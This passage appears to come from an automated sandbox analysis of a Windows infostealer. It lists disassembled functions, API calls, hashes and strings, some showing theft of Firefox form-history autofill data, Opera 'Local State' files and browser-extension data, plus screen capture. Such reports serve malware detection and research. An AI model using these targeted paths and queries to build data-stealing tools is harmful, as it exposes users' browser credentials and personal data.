                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045B6DB, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 0045B6E9
                                                                                                                                              • Part of subcall function 0045EF7B: __EH_prolog3_GS.LIBCMT ref: 0045EF85
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_InfoSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2966166590-0
                                                                                                                                            • Opcode ID: 6e5c8cf968b7abbe7a2c7270f2e7670df8ce56450aecab8f7f5c6fdf89f997a7
                                                                                                                                            • Instruction ID: 823539260a3d4a885370422174712ae043203a505dc6b955a3141a021d405392
                                                                                                                                            • Opcode Fuzzy Hash: 6e5c8cf968b7abbe7a2c7270f2e7670df8ce56450aecab8f7f5c6fdf89f997a7
                                                                                                                                            • Instruction Fuzzy Hash: BFD05E3280010EFBCF00EFE5C885EDDBB79AB18349F008024F601A2061DB34D69ECB94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045CCBD, Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GdipAlloc.GDIPLUS(00000010,0045CF44,?,00000000), ref: 0045CCBF
                                                                                                                                              • Part of subcall function 0045CC8D: GdipCreateBitmapFromHBITMAP.GDIPLUS(?,?,00000000), ref: 0045CCA8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Gdip$AllocBitmapCreateFrom
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3133781713-0
                                                                                                                                            • Opcode ID: 5eca075585a3d20c3835df4fd6959b19dadf7f10efac53f42c59fc3682fb590c
                                                                                                                                            • Instruction ID: e0dccf603221377bfe0556e305b4e57607d21a7ebb71dcdf50bd8a74eface6d1
                                                                                                                                            • Opcode Fuzzy Hash: 5eca075585a3d20c3835df4fd6959b19dadf7f10efac53f42c59fc3682fb590c
                                                                                                                                            • Instruction Fuzzy Hash: 10C04C2425834269EF422A31CD4162B69926B94386F44486D7D88C11A6EA7DC854B616
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045CE54, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,0040558F,00000000,?,?,?,?,\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT,00000042,?,?,?,?,?,?,00000018), ref: 0045CE58
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: aa5854d154c6e7c11dfe0ff28ec14d474d5d748d1745297cee2698e5425d4379
                                                                                                                                            • Instruction ID: b6db97647bcf8968926a58c506f007f98286e5b84d0cfe16cae80a27485a4bdf
                                                                                                                                            • Opcode Fuzzy Hash: aa5854d154c6e7c11dfe0ff28ec14d474d5d748d1745297cee2698e5425d4379
                                                                                                                                            • Instruction Fuzzy Hash: FDC08C301353004D466002346D8A02B21818B11F27F204E32ECA6D01F3D324889AE00C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040C66E, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(?,0040C718,?), ref: 0040C672
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: e672ef7c9fa4a4ed0e43f7c94f32a7930382825d87c09943d9ea5366e1d91e8c
                                                                                                                                            • Instruction ID: 9623978566a13163ebf1fdd15260dcd195bb4f106b9ea2548d8e3e34d2e93389
                                                                                                                                            • Opcode Fuzzy Hash: e672ef7c9fa4a4ed0e43f7c94f32a7930382825d87c09943d9ea5366e1d91e8c
                                                                                                                                            • Instruction Fuzzy Hash: 46C08C3001600089EA2007384D4401722828A8122AF081F30E8AAD01F4D7358C0A6004
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045CE37, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNEL32(?,004106D1,00000000,?,?,?,?,?,?,?,00000014), ref: 0045CE3B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: e16dd7c486461ea82ed0f9b1e7d4d2f70c1299e5e68409f558dcab0c2fa1a782
                                                                                                                                            • Instruction ID: 570e3f23ac39e16af4e7c6df658695db8ada012fef325d6ff0a852b327d2b658
                                                                                                                                            • Opcode Fuzzy Hash: e16dd7c486461ea82ed0f9b1e7d4d2f70c1299e5e68409f558dcab0c2fa1a782
                                                                                                                                            • Instruction Fuzzy Hash: 19C08C300122008D475007384DCA42B21848B11B27B20CE32E8BAC02E2E324C85A611C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040D1DD, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fputc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4236582747-0
                                                                                                                                            • Opcode ID: e389594bdf39ec1e2d3253897741f4b08d236f86a1ee9cb2eed4abff1d20b6ee
                                                                                                                                            • Instruction ID: f0bc1a3a62f2ebbf28378a0a386d5c8a5abc36d52eaa9ff9b6ae60760155b54d
                                                                                                                                            • Opcode Fuzzy Hash: e389594bdf39ec1e2d3253897741f4b08d236f86a1ee9cb2eed4abff1d20b6ee
                                                                                                                                            • Instruction Fuzzy Hash: DDC02B3F00C2017B890C4270850201F3A850D411B0F244B0FF070C00D1E829C4805206
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004653B6, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __wfsopen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 197181222-0
                                                                                                                                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                            • Instruction ID: 724d0335c9459524320b71309a1e1bd0d92063b975a79ff18547e2be26795fa1
                                                                                                                                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                            • Instruction Fuzzy Hash: 45C09B7244010C77CF111943EC02E457F1997C0764F044051FB1C19161A577D5619589
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0046647E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fsopen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3646066109-0
                                                                                                                                            • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                            • Instruction ID: ca6bc557937b0fe9e9dbb5f3d0265ed4f3fdeeff8590b3228c03f6c62ce511f7
                                                                                                                                            • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                            • Instruction Fuzzy Hash: 70C092B354020C77CF112E83EC02E4A3F1A9BD0764F059021FF1C19261EA7BEAB5968A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045CDA7, Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000105,00000000,00000104,0040DFD0,0000000F,?,00000000,?,?,?,?,?,?,?,00000014), ref: 0045CDBF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocLocal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3494564517-0
                                                                                                                                            • Opcode ID: 549ee109149976aca89fb3f0d38d5934c63fbb8c442b6e4a47654845091a4199
                                                                                                                                            • Instruction ID: ce4f0f3aed6216ecb052ebf060a52150e44cd380350fa4fc2c0470240b7a55f6
                                                                                                                                            • Opcode Fuzzy Hash: 549ee109149976aca89fb3f0d38d5934c63fbb8c442b6e4a47654845091a4199
                                                                                                                                            • Instruction Fuzzy Hash: 39E02B356057518F8322491C88805ABFBB69FC5B51B09817FDD54D731AC634DC0DC3D4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 00426109, Relevance: 18.4, APIs: 5, Strings: 5, Instructions: 903COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: +Inf$-Inf$-x0$0123456789ABCDEF0123456789abcdef$Inf
                                                                                                                                            • API String ID: 0-2616461613
                                                                                                                                            • Opcode ID: a49f2091a073c9c238fbea3ac9babf60fff8e1fc78ae5d271f8bf36ec25b5538
                                                                                                                                            • Instruction ID: ab551316a3f2a03bae825910a0c90ecc4526faab41a28b804d26610bfdfae947
                                                                                                                                            • Opcode Fuzzy Hash: a49f2091a073c9c238fbea3ac9babf60fff8e1fc78ae5d271f8bf36ec25b5538
                                                                                                                                            • Instruction Fuzzy Hash: 14724A71F04269AADF12DF58E5403EE7FB0EF11300F66449BE880A7352D6398E95CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045652F, Relevance: 9.9, APIs: 2, Strings: 3, Instructions: 1173COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID: ROWID$no such column: %s$rows updated
                                                                                                                                            • API String ID: 2102423945-702578623
                                                                                                                                            • Opcode ID: 674f759d5b889990307cc6186f441c3fd37df64ef051da75290976d96ec79660
                                                                                                                                            • Instruction ID: 57dfe8941f5b2dee570606b2e3a3c5a143dd0b2f7f03028547a25a383fcab02f
                                                                                                                                            • Opcode Fuzzy Hash: 674f759d5b889990307cc6186f441c3fd37df64ef051da75290976d96ec79660
                                                                                                                                            • Instruction Fuzzy Hash: 6EA27871A00248AFCF25DFA5C881AAE7BB2FF08305F55412AFD1497262D33ADC95CB94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00462085, Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ct_init: 256+dist != 512$ct_init: dist != 256$ct_init: length != 256
                                                                                                                                            • API String ID: 0-2704465662
                                                                                                                                            • Opcode ID: 975d37422d54367a125b96b6aa38f76e5de089b86b77bfec11da8317f20e6afe
                                                                                                                                            • Instruction ID: aa10a150105956d6e3ebdf48a03ede67db25bc148a19edbd8a3c2a8a930f24a0
                                                                                                                                            • Opcode Fuzzy Hash: 975d37422d54367a125b96b6aa38f76e5de089b86b77bfec11da8317f20e6afe
                                                                                                                                            • Instruction Fuzzy Hash: E1610972640A05AFE7148F25C8816EA73E1EFC5318F10C53FE85ACB291EB78AA45CB45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004000A5, Relevance: 1.2, Instructions: 1207COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 434b64bf602ae09a6d2e84b3b7b117f7390fe34cf0d92c42f9f0635178b7622b
                                                                                                                                            • Instruction ID: 24206e6b7c52da3951e7cba7e2a6f5ea14e11e17a23ebdcafb392f95a75d1a19
                                                                                                                                            • Opcode Fuzzy Hash: 434b64bf602ae09a6d2e84b3b7b117f7390fe34cf0d92c42f9f0635178b7622b
                                                                                                                                            • Instruction Fuzzy Hash: 1D4163A248E3D00FD70387746C696A17FB5AE63224B1E41DBD0C1CF1A3E25C4A5ED366
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0047627D, Relevance: .4, Instructions: 355COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                            • Instruction ID: fb42559062675d5daa4eee83e8af54481d406915f079b44e1bb125edc856e9ed
                                                                                                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                            • Instruction Fuzzy Hash: A9C17273D1ADF24A8776452D04182BFEE626E81B4031FC3E6DCD83F28DC62A6D1595D4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042E5AC, Relevance: 31.9, APIs: 12, Strings: 6, Instructions: 367COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00425FF2: _memset.LIBCMT ref: 00426000
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E762
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E788
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E7C8
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042E813
                                                                                                                                            • __allrem.LIBCMT ref: 0042E81D
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042E83D
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042E8A1
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042E8C2
                                                                                                                                            • __allrem.LIBCMT ref: 0042E8CC
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E8EF
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E90B
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E944
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fprintf_l$Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$_memset
                                                                                                                                            • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld
                                                                                                                                            • API String ID: 2116274655-866662573
                                                                                                                                            • Opcode ID: d10a46314bd45a974ba71c2d6c5be3ae24f1c9a4afe65dc82ec6d5600d5a5aac
                                                                                                                                            • Instruction ID: 59ebd0eaa01591ea6f438994b0c4b6a8c54e77c2d33e9c88279e2d25b8d13768
                                                                                                                                            • Opcode Fuzzy Hash: d10a46314bd45a974ba71c2d6c5be3ae24f1c9a4afe65dc82ec6d5600d5a5aac
                                                                                                                                            • Instruction Fuzzy Hash: 30B16C72F00229ABDF24DF6AFC85BAE7B65EB11304F98401BF805AB251D63C9D418759
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040C115, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 111filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset_sprintflstrcat
                                                                                                                                            • String ID: %s%s$Autofill\%s_%s.txt$SELECT fieldname, value FROM moz_formhistory$\temp
                                                                                                                                            • API String ID: 2288810340-1758122038
                                                                                                                                            • Opcode ID: 8a6ca915d4e357006ff092d36cb01e6b46b969b8fab9e14e73c7e59797270786
                                                                                                                                            • Instruction ID: b5d9f1ae30970d6fb8a1541b6fb39d6ef66355b25e8e1df5f4aba7808fba6b5e
                                                                                                                                            • Opcode Fuzzy Hash: 8a6ca915d4e357006ff092d36cb01e6b46b969b8fab9e14e73c7e59797270786
                                                                                                                                            • Instruction Fuzzy Hash: A731A2B2904108ABEF20BBB5DD85EDE7BBCAF05304F20052FF505F3152EA7956458B69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00428512, Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 228COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fprintf_l
                                                                                                                                            • String ID: %!.15g$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                            • API String ID: 3906573944-2866863630
                                                                                                                                            • Opcode ID: 756cdb9a34c76d3e9551230c6ec8f3e9de14ea70de35a6fe5b8db96dcddc741d
                                                                                                                                            • Instruction ID: b46538fb6e54405b38e1e9d409be6b970f8607a036b2228d731f2c714c6497b4
                                                                                                                                            • Opcode Fuzzy Hash: 756cdb9a34c76d3e9551230c6ec8f3e9de14ea70de35a6fe5b8db96dcddc741d
                                                                                                                                            • Instruction Fuzzy Hash: 66818E71A01218AFCF14DFA4EC41BEEB7B4EF04304F64445FE855AB251DB38AA45CB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040C555, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __wgetenv.LIBCMT ref: 0040C568
                                                                                                                                            • LoadLibraryA.KERNEL32(73BB81D0,?,0040C728), ref: 0040C5A5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040C5C1
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C5D4
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C5E7
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C5FA
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C60D
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C620
                                                                                                                                              • Part of subcall function 00466D8B: __lock.LIBCMT ref: 00466D99
                                                                                                                                              • Part of subcall function 00466D8B: __putenv_helper.LIBCMT ref: 00466DA8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad__lock__putenv_helper__wgetenv
                                                                                                                                            • String ID: PATH$PATH=
                                                                                                                                            • API String ID: 1998870925-3104081819
                                                                                                                                            • Opcode ID: 648daf23e2b7e3e5f560b4b67a7fa6df92e82b89d988bf14c660be566d2d21f8
                                                                                                                                            • Instruction ID: 749364ff0aae939879f3602be9c2d0c956f37d9086b715c614d5d77d4b111b4f
                                                                                                                                            • Opcode Fuzzy Hash: 648daf23e2b7e3e5f560b4b67a7fa6df92e82b89d988bf14c660be566d2d21f8
                                                                                                                                            • Instruction Fuzzy Hash: 42218030829610EFCB226F36FD4482B7FA1F7A5B107240A3BF508916B5E63A0850DF5D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004522F3, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 365COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00420E26: _memset.LIBCMT ref: 00420E45
                                                                                                                                            • _memset.LIBCMT ref: 00452361
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID: 2$cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                            • API String ID: 2102423945-2177023506
                                                                                                                                            • Opcode ID: 6c194331608b64a049b1626614e97c4952d804e1acb6fab56eab57784b1c9e40
                                                                                                                                            • Instruction ID: 90b8c29a4797a8226e3fad4fa02505f543a33da32baabd07e67949b1d9f36422
                                                                                                                                            • Opcode Fuzzy Hash: 6c194331608b64a049b1626614e97c4952d804e1acb6fab56eab57784b1c9e40
                                                                                                                                            • Instruction Fuzzy Hash: 7ED1FF71A00219AFCB20DF65CA81AAEB7B1FF49305F15415FE805AB342D7B8ED55CB88
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0043E46F, Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 358COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$_memset
                                                                                                                                            • String ID: -journal$-wal$immutable$nolock
                                                                                                                                            • API String ID: 1357608183-3408036318
                                                                                                                                            • Opcode ID: 7dc463ba19c3b6738e20bac7e6bb6d101b571ef453de645da86720febe7046c3
                                                                                                                                            • Instruction ID: e7f78fe7085c957a1dbaccb79e445a5d2d2144a0e94fbef335f04c763272fd31
                                                                                                                                            • Opcode Fuzzy Hash: 7dc463ba19c3b6738e20bac7e6bb6d101b571ef453de645da86720febe7046c3
                                                                                                                                            • Instruction Fuzzy Hash: F2E18F71D01249DFCF14DFA5C8817DEBBB1AF18318F18456EE858AB382D7789941CB68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004105E2, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 133stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00410601
                                                                                                                                            • _memset.LIBCMT ref: 0041062B
                                                                                                                                              • Part of subcall function 0045D0A6: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040C6DE,?,0000001A), ref: 0045D0C0
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,0000001A,?,?,00000014), ref: 0041064C
                                                                                                                                            • _memset.LIBCMT ref: 00410657
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 0041066A
                                                                                                                                            • lstrcatA.KERNEL32(?,\Opera Stable\Local State,?,?,?,?,?,00000014), ref: 00410678
                                                                                                                                            Strings
                                                                                                                                            • \Opera Stable\Local State, xrefs: 0041066C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcat$_memset$FolderH_prolog3Path
                                                                                                                                            • String ID: \Opera Stable\Local State
                                                                                                                                            • API String ID: 1637166636-1169881389
                                                                                                                                            • Opcode ID: 6879ab872e6dac635e071d96e750388a720df2c81c3f419c1fc2b8ede3438f7e
                                                                                                                                            • Instruction ID: 9fa308de8bd29bfd170ffa03d73bb99151a78d3c7a77891f23554a9e69a2f933
                                                                                                                                            • Opcode Fuzzy Hash: 6879ab872e6dac635e071d96e750388a720df2c81c3f419c1fc2b8ede3438f7e
                                                                                                                                            • Instruction Fuzzy Hash: 94410D7290014DAFDB14EF95DC85EDE77BCEB08344F50412BE905A7181EB78A748CBA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0044602F, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • cannot detach database %s, xrefs: 004460BA
                                                                                                                                            • cannot DETACH database within transaction, xrefs: 004460C7
                                                                                                                                            • no such database: %s, xrefs: 004460AB
                                                                                                                                            • database %s is locked, xrefs: 00446107
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fprintf_l
                                                                                                                                            • String ID: cannot DETACH database within transaction$cannot detach database %s$database %s is locked$no such database: %s
                                                                                                                                            • API String ID: 3906573944-3374617522
                                                                                                                                            • Opcode ID: e6fde8c3f54e8f0526b635b49682bd7ed5ffe65d9ba0f10eb27dc2629df12d11
                                                                                                                                            • Instruction ID: 8a3f3a8e55f6d4cabd2d27184e484aae6f0c9101ddf461e5301ec0d2322aee95
                                                                                                                                            • Opcode Fuzzy Hash: e6fde8c3f54e8f0526b635b49682bd7ed5ffe65d9ba0f10eb27dc2629df12d11
                                                                                                                                            • Instruction Fuzzy Hash: D931CD71A002089FEF20DF94C881AAEB7F5EB09304F25495BE811A7242C779A949CB5A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045C1E2, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0045C1EC
                                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0045C204
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0045C219
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0045C229
